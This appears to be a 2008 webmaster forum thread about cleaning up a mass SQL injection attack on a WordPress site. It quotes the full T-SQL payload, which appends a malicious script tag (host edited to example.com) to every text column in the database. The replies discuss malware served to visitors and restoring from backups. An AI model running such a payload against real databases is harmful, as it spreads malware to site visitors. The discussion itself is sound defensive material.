[webmasterworld.com...]

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.example.com/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

If I get any further with this, I'll write back here.

[edited by: tedster at 10:04 pm (utc) on Aug. 26, 2008]
[edit reason] use example.com [/edit]

I now have to go through every table in the wordpress database to see if any of this stuff has been successfully inserted. It seems pointless though as if this code worked, it would overwrite the contents of all the database tables and therefore render wordpress useless, so nothing would be served up.

At least this is what I think at the moment. Of course I could be completely wrong.

It adds an iframe into the database, so that it will get served up with every page.

It's the payload in the <iframe> that is doing the damage to visitors. Malware, Spyware, etc.

You will most likely need to restore from a db that was not injected. My understanding is that once you've thought you removed it, the bugger comes back because there was another one somewhere else in the db.

Here's another topic that may help...

Sql Injection virus problem.
[webmasterworld.com...]

See the other thread.

I can't do much about wordpress, but for my general coding I use CodeIgniter framework now. And as far as I can see, it has good, easy to use tools to help the programmer avoid this type of sql injection attack.

Jim